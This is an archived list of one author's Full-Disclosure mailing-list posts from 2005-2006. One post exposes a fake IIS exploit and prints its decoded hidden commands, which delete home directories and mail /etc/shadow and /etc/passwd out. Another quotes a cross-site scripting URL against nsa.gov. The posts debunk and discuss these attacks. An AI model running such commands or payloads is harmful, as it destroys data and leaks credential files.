[Full-disclosure] Advisory 2006-03-11 Heap Overflow in ISC INN

2006-03-11 Thread Paul Kurczaba
CONTACT: *Paul Kurczaba [EMAIL PROTECTED] *1-888-LOL-WHAT *CISSP GSAE CCE CEH CSFA GREM SSP-CNSA SSP-MPA GIPS GHTQ GWAS ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia

[Full-disclosure] Spam from SecurityFocus outgoing email servers!

2005-03-07 Thread Paul Kurczaba
tttqltikulaftqyymdrvqmsy = END ORIGINAL SPAM EMAIL SOURCE -Paul Kurczaba ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://www.secunia.com/

Re: [Full-disclosure] Multiple Vulnerabilities of PY Software Active Webcam WebServer

2005-03-11 Thread Paul Kurczaba
It appers that the server does not use multithreading... QUOTE START: Before the administrator press "Cancel" or "Yes",the other request will be paused,that means the other user cannt Access the HTTP Server,thus leading to a Denial Of Service QUOTE END Sowhat . wrote: Multiple Vulnerabilities of PY

Re: [Full-disclosure] Re: Internet Going Down For Maintenance

2005-04-01 Thread Paul Kurczaba
Wait... Its not? :) Jason Weisberger wrote: LOL. I'd love or someone to buy this one. As if the Internet is in one central location. On Fri, 1 Apr 2005 08:51:26 -0800, [EMAIL PROTECTED] wrote: Actually, I believe that since the internet core is run off of the MS platform that this has something

Re: [Full-disclosure] Oddness with the MS antispyware beta

2005-04-11 Thread Paul Kurczaba
If you hold down "alt" + "tab", does the hidden windows name and icon appear on the list? MN Vasquez wrote: I don't know if this is programming technique is "common", but I've not seen it before. I'm running the MS antispyware beta 1 on Windows XP sp2. I hooked up a 2nd monitor to my laptop.

Re: [Full-disclosure] IIS 6 Remote Buffer Overflow Exploit

2005-04-19 Thread Paul Kurczaba
THIS ADVISORY IS FALSE!!! "shellcode" is decoded to be: /bin/rm -rf /home/*;clear;echo bl4ckh4t,hehe "launcher" is decoded to be: cat /etc/shadow |mail full-disclosure@lists.grok.org.uk "netcat_shell" is decoded to be: cat /etc/passwd |mail full-disclosure@lists.grok.org.uk Day

Re: [Full-disclosure] Micky-dee's anyone?

2005-05-01 Thread Paul Kurczaba
Just another case of cross site scripting. I would understand people caring if it was a bank's site...but McDonalds? [EMAIL PROTECTED] wrote: To all you people that like McDonalds, here is a quick link that may show you the light: http://www.mcdonalds.com/app_controller.bumper.bumper.html?_con

Re: [Full-disclosure] Not even the NSA can get it right

2005-05-25 Thread Paul Kurczaba
The NSA may have some of the world's best mathematicians, but certainly not the world's best web-coders :) Barrie Dempster wrote: http://www.nsa.gov/notices/notic3.cfm?Address=%22%3E%3Cscript% 3Ealert(%22We%20love%20our%20XSS%22)%3C/script%3E

Re: [Full-disclosure] Not even the NSA can get it right

2005-05-25 Thread Paul Kurczaba
To the NSA's advantage, I truly believe that the NSA.gov site is a natural honeypot. If you think of all the people that try to break in to it, the NSA looks at their logs and says "Sweet!, we've learned something new today. Keep on comming..." just my $0.02 [EMAIL PROTECTED] wrote: On We

Re: [Full-disclosure] Gmail blacklisted by Full-Disclosure

2005-06-20 Thread Paul Kurczaba
Complain to Gmail, considering that they are the ones blacklisted. As mentioned before, it is good that FD uses blacklists. n3td3v wrote: Hello security community, Full-Disclosure, a high profile mailing list where the world's security engineers and other related meet and read security informa

Re: [Full-disclosure] Re: alert: the 111111 bug

2005-07-04 Thread Paul Kurczaba
it is a Friday. Thomas Binder wrote: Hi! On Sun, Jul 03, 2005 at 10:18:02PM -0500, Paul Schmehl wrote: Not to worry. The 11th of November, 2011 is a Saturday. No one will be working that day. :-) Mhmm, it's a Friday according to my calendar - is mine or yours in error? Ciao Thomas

Re: [Full-disclosure] [TOOLS] CIRT.DK WebRoot Version v.1.7

2005-07-20 Thread Paul Kurczaba
And what prevents ANYONE from downloading this...? [EMAIL PROTECTED] wrote: On Mon, 18 Jul 2005 22:05:49 +0200, "CIRT.DK Advisory" said: Name: CIRT.DK WebRoot - Bruteforcing tool Version: 1.7 Author/Developer: Dennis Rand - CIRT.DK Website: http://www.cirt.dk

Re: [Full-disclosure] [TOOLS] CIRT.DK WebRoot Version v.1.7

2005-07-21 Thread Paul Kurczaba
What if I have dual citizenship? -Paul Anders Breindahl wrote: On Tuesday 19 July 2005 21:09, [EMAIL PROTECTED] wrote: On Mon, 18 Jul 2005 22:05:49 +0200, "CIRT.DK Advisory" said: Name: CIRT.DK WebRoot - Bruteforcing tool Version: 1.7 Author/Developer: Dennis Rand -